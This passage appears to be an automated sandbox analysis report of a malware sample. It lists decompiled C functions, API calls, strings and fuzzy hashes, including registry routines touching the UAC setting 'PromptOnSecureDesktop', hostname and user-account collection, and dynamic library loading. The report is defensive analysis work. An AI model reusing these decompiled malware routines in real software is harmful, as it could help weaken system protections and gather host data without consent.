lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F

Strings

localcfg, xrefs: 0040E8AB
flags_upd, xrefs: 0040E8A7

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
String ID: flags_upd$localcfg
API String ID: 204374128-3505511081
Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54

Uniqueness

Uniqueness Score: -1.00%

Function 0223E8A4, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 96stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0223DF55: GetCurrentThreadId.KERNEL32 ref: 0223DFA3

lstrcmp.KERNEL32(00410178,00000000), ref: 0223E8E3
lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,02236111), ref: 0223E939
lstrcmp.KERNEL32(?,00000008), ref: 0223E972

Strings

A, xrefs: 0223E949, 0223E94E
A, xrefs: 0223E989
A, xrefs: 0223E8AF, 0223E8B6, 0223E91F, 0223E981

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: lstrcmp$CurrentThreadlstrcpyn
String ID: A$ A$ A
API String ID: 2920362961-1846390581
Opcode ID: 4a09ae13f75b70695590e1211a4283afa5e70fe241f7b7456c21d2ce388cae94
Instruction ID: 2b1badde8b90d52205eb99c13872befed3f1fb8efdd061716960863be1c119cb
Opcode Fuzzy Hash: 4a09ae13f75b70695590e1211a4283afa5e70fe241f7b7456c21d2ce388cae94
Instruction Fuzzy Hash: EA31D0B1A14316DFCF32CFA4D8847967BE4EF05724F02852AE555C7668E770E888CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02236DF7, Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

IsBadCodePtr.KERNEL32 ref: 02236E02

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Code
String ID:
API String ID: 3609698214-0
Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
Instruction ID: 3becd20ffb26364c1473cb89394e520866e692d459aad78abb08c77afbeb49f7
Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
Instruction Fuzzy Hash: A32181B2124216FFDB125BE0FC49EEF3EEDDB49664B118025F602D1068EB71CA449678

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD05, Relevance: 9.0, APIs: 6, Instructions: 34
threadsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DD05() {
				long _t4;
				long _t10;

				_t10 = GetTickCount();
				while(InterlockedExchange(0x4136b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x4136b8) {
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x4136bc =  *0x4136bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					L7:
					_t4 = GetCurrentThreadId();
					 *0x4136bc =  *0x4136bc + 1;
					 *0x4136b8 = _t4;
					return _t4;
				}
				goto L7;
			}

0x0040dd17
0x0040dd41
0x0040dd2c
0x0040dd37
0x0040dd4c
0x0040dd39
0x0040dd3b
0x00000000
0x0040dd3b
0x0040dd37
0x0040dd53
0x0040dd53
0x0040dd59
0x0040dd62
0x0040dd68
0x0040dd68
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040DD0F
GetCurrentThreadId.KERNEL32 ref: 0040DD20
GetTickCount.KERNEL32 ref: 0040DD2E
Sleep.KERNEL32(00000000,?,73B743E0,?,00000000,0040E538,?,73B743E0,?,00000000,?,0040A445), ref: 0040DD3B
InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
GetCurrentThreadId.KERNEL32 ref: 0040DD53

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
String ID:
API String ID: 3819781495-0
Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E

Uniqueness

Uniqueness Score: -1.00%

Function 0223C52C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 182threadCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0223C69D
InterlockedIncrement.KERNEL32(0223C734), ref: 0223C6FE
CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0223C730), ref: 0223C711
CloseHandle.KERNEL32(00000000,?,0223C730,00413588,02238A60), ref: 0223C71C

Strings

localcfg, xrefs: 0223C52D

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
String ID: localcfg
API String ID: 1026198776-1857712256
Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
Instruction ID: 1b30269c6bffc305bbe8a7c63dff8466f6aca5cc00e8293266fb6157e7ca05e1
Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
Instruction Fuzzy Hash: BB5149B1A10B418FC7259FA9C5C462ABBE9FB88304B50593FE18BD7A94D775E844CF10

Uniqueness

Uniqueness Score: -1.00%

Function 004080C9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004080C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				CHAR _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x412c3c = 0;
				 *0x412c38 = 0;
				if(E00406EC3() != 0) {
					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x412c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0040EC2E(_t42);
							 *0x412c3c = 0;
							goto L17;
						} else {
							_t45 = E0040EBCC(_v8);
							_pop(_t56);
							 *0x412c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0040EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x412c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0040EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E00407EE6(_t56);
					L20:
					_t70 =  *0x4121a8; // 0x0
					if(_t70 != 0) {
						_t71 =  *0x4121a4; // 0x0
						if(_t71 == 0) {
							_t31 = E0040675C(0x4121a8,  &_v20, 0);
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x4122d4 = E004024C2(_t61, _t63, 0);
								 *0x4121a4 = _t63;
								E0040EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}

0x004080c9
0x004080d7
0x004080da
0x004080e0
0x004080ed
0x0040810b
0x00408110
0x00408115
0x00000000
0x00408130
0x00408151
0x00408156
0x00408167
0x00408216
0x0040821d
0x00408222
0x00000000
0x00408222
0x0040818b
0x004081f7
0x004081f7
0x004081fe
0x00000000
0x00000000
0x00408201
0x00408206
0x00000000
0x00408198
0x0040819b
0x004081a0
0x004081a1
0x004081a8
0x0040820d
0x00408210
0x00000000
0x00408210
0x004081aa
0x004081c2
0x00000000
0x00000000
0x004081c4
0x004081ca
0x004081cd
0x004081cd
0x004081cf
0x004081d0
0x004081d8
0x004081dd
0x004081de
0x004081e5
0x00000000
0x00000000
0x004081ef
0x0040820c
0x0040820c
0x00000000
0x0040820c
0x0040818b
0x004080ef
0x004080ef
0x00408225
0x00408225
0x0040822b
0x0040822d
0x00408233
0x0040823f
0x00408244
0x0040824b
0x0040824d
0x00408259
0x0040825e
0x00408264
0x00408269
0x0040824b
0x00408233
0x00408273
0x00408273

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 0040815F
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 00408187
RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 004081BE
RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 00408210

Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,73B743E0,00000000), ref: 0040677E
Part of subcall function 0040675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,73B743E0,00000000), ref: 0040679A
Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,73B743E0,00000000), ref: 004067B0
Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,73B743E0,00000000), ref: 004067BF
Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,73B743E0,00000000), ref: 004067D3
Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,73B743E0,00000000), ref: 00406807
Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040681F
Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,73B743E0,00000000), ref: 0040683E
Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040685C

Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48

Strings

PromptOnSecureDesktop, xrefs: 0040814B, 00408150, 0040821C

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
String ID: PromptOnSecureDesktop
API String ID: 124786226-2980165447
Opcode ID: ea8ba2e8eb28e3afba43c8b8a5886e3626a99019ac245c8ed30e751eb82747cd
Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
Opcode Fuzzy Hash: ea8ba2e8eb28e3afba43c8b8a5886e3626a99019ac245c8ed30e751eb82747cd
Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59

Uniqueness

Uniqueness Score: -1.00%

Function 0223E2E5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(80000001,0223E4F3,00000000,00000000,00000000,00020106,00000000,0223E4F3,00000000,000000E4), ref: 0223E302
RegSetValueExA.ADVAPI32(0223E4F3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0223E377
RegDeleteValueA.ADVAPI32(0223E4F3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0223E3A8
RegCloseKey.ADVAPI32(0223E4F3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0223E4F3), ref: 0223E3B1

Strings

PromptOnSecureDesktop, xrefs: 0223E323

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseCreateDelete
String ID: PromptOnSecureDesktop
API String ID: 2667537340-2980165447
Opcode ID: 403dd785c3dc887d5499fe87f8b44f66fc3f9527f965189c16045500b01baaac
Instruction ID: 731aa86691e44bb7de188109f0eda1e23c90b9b5935ffb44c2e639059ad7abc6
Opcode Fuzzy Hash: 403dd785c3dc887d5499fe87f8b44f66fc3f9527f965189c16045500b01baaac
Instruction Fuzzy Hash: 80214CB1A0021DABDF219FE4EC89EEE7FB9EF09750F048061F904A6154E371CA58CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040E095, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
					_t55 = 0x1c;
				}
				E0040EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}

0x0040e09c
0x0040e0ba
0x00000000
0x0040e172
0x0040e0c3
0x0040e0c6
0x0040e0c9
0x0040e0cc
0x0040e0cc
0x0040e0ce
0x0040e0cf
0x0040e0d7
0x0040e0d9
0x0040e0df
0x0040e0e3
0x0040e0e3
0x0040e0ec
0x0040e0f1
0x0040e0f4
0x0040e0f9
0x0040e13f
0x0040e149
0x0040e158
0x0040e161
0x00000000
0x0040e0fb
0x0040e0fb
0x0040e0fb
0x0040e102
0x0040e104
0x0040e104
0x0040e110
0x0040e115
0x0040e12f
0x00000000
0x00000000
0x0040e131
0x0040e134
0x0040e136
0x0040e13b
0x00000000
0x00000000
0x00000000
0x0040e13b
0x0040e13d
0x00000000
0x0040e13d

APIs

RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161

Strings

PromptOnSecureDesktop, xrefs: 0040E0D3

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Value$CloseCreateDelete
String ID: PromptOnSecureDesktop
API String ID: 2667537340-2980165447
Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94

Uniqueness

Uniqueness Score: -1.00%

Function 022371AF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 022371CA
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02237211
LocalFree.KERNEL32(?,?,?), ref: 0223726F
wsprintfA.USER32 ref: 02237286

Strings

|, xrefs: 02237203

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Name$AccountFreeLocalLookupUserwsprintf
String ID: |
API String ID: 2539190677-2343686810
Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
Instruction ID: fb9ff80a21b9bbaa3628c30237eb57f3eaa882de1c7e36d3c489a55c11c4899f
Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
Instruction Fuzzy Hash: EA3129B2A10209BFDF02DFA8D944BDA7BA8EF04354F048066F859DB215EA74D6488B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD08, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AD08(CHAR* _a4) {
				char _v132;
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;
				_t11 = _v132;
				_t12 =  &_v132;
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {
						if(_t11 < 0x41 || _t11 > 0x5a) {
							if(_t11 < 0x30 || _t11 > 0x39) {
								if(_t11 != 0x2e) {
									goto L10;
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}

0x0040ad1c
0x0040ad24
0x0040ad71
0x0040ad74
0x0040ad77
0x0040ad88
0x0040ad88
0x00000000
0x0040ad7f
0x0040ad26
0x0040ad29
0x0040ad2c
0x0040ad2f
0x0040ad55
0x0040ad35
0x0040ad3d
0x0040ad45
0x0040ad4d
0x00000000
0x00000000
0x0040ad4d
0x0040ad45
0x00000000
0x0040ad4f
0x0040ad4f
0x0040ad4f
0x0040ad51
0x0040ad52
0x0040ad52
0x0040ad53
0x00000000
0x0040ad53
0x0040ad35
0x0040ad60
0x0040ad66
0x0040ad69
0x0040ad6b
0x0040ad6b
0x00000000

APIs

gethostname.WS2_32(?,00000080), ref: 0040AD1C
lstrlenA.KERNEL32(00000000), ref: 0040AD60
lstrlenA.KERNEL32(00000000), ref: 0040AD69
lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F

Strings

LocalHost, xrefs: 0040AD79

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$gethostnamelstrcpy
String ID: LocalHost
API String ID: 3695455745-3154191806
Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F

Uniqueness

Uniqueness Score: -1.00%

Function 0223B461, Relevance: 7.6, APIs: 5, Instructions: 131timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0223B503
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0223B512
SystemTimeToFileTime.KERNEL32(?,?), ref: 0223B531
GetTimeZoneInformation.KERNEL32(?), ref: 0223B579
wsprintfA.USER32 ref: 0223B607

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Time$File$Local$InformationSystemZonewsprintf
String ID:
API String ID: 4026320513-0
Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction ID: ef02144237cb83d22bcaa11bd0a595aca4b41069cf07b3b2797b36787d23fbfc
Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction Fuzzy Hash: 655120B2D1021DAACF15DFD5D8845EEBBB9BF48308F10812AE501B6154E7B94AC9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 022362B9, Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 022362EC
LoadLibraryA.KERNEL32(?), ref: 02236313
GetProcAddress.KERNEL32(00000000,?), ref: 0223639A
IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 022363EE

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: HugeRead$AddressLibraryLoadProc
String ID:
API String ID: 3498078134-0
Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
Instruction ID: 4299794d7fb3ff3e888927bc506d26e06d9a5a0366c45474c842df3c27b1fdc4
Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
Instruction Fuzzy Hash: F6419FB1A20206BFDB25CF98C884BB9B7BDEF04754F148069E925DB294D770E945CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00402923, Relevance: 7.6, APIs: 5, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {
					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0040EE2A(_t76,  &_v296, 0, 0x114);
							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {
								goto L13;
							}
							_t79 = __imp__#15;
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;
							if((_t53 & 0x0000ffff) + _t71 > _a4) {
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0040EE2A(_t76, _t80, 0, 0x124);
							E0040EE08(_t80,  &_v296, 0x114);
							 *_t80 =  *_t80 & 0x00000000;
							_t67 = _t71 + (_v28 & 0x0000ffff);
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;
							} else {
								_v16 = _t80;
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}

0x00402923
0x00402931
0x00402932
0x00402935
0x0040293b
0x00402950
0x00402957
0x0040296a
0x0040296e
0x00402970
0x00402973
0x00402978
0x00402a5b
0x00402a5b
0x00402a5e
0x00000000
0x00402a5e
0x0040297e
0x00402995
0x004029ac
0x004029ae
0x004029b1
0x004029b7
0x00000000
0x00000000
0x004029c1
0x004029ca
0x004029d6
0x004029e0
0x004029e2
0x004029e6
0x004029ee
0x004029f4
0x00000000
0x00000000
0x00402a0a
0x00402a0e
0x00000000
0x00000000
0x00402a18
0x00402a2a
0x00402a33
0x00402a36
0x00402a38
0x00402a3b
0x00402a3e
0x00402a43
0x00402a4a
0x00402a45
0x00402a45
0x00402a45
0x00402a4c
0x00402a55
0x00000000
0x00000000
0x00000000
0x00000000
0x00402a55
0x00000000
0x0040297e
0x00402959
0x00000000
0x00402959
0x00000000

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040E654, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t30;
				CHAR* _t31;
				int _t34;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr _t51;
				int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;
				char _t59;

				E0040DD05();
				_t41 = 0x4120e8;
				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
				if(_t55 == 0) {
					L9:
					_t53 = E0040EBCC(0x1c);
					if(_t53 != 0) {
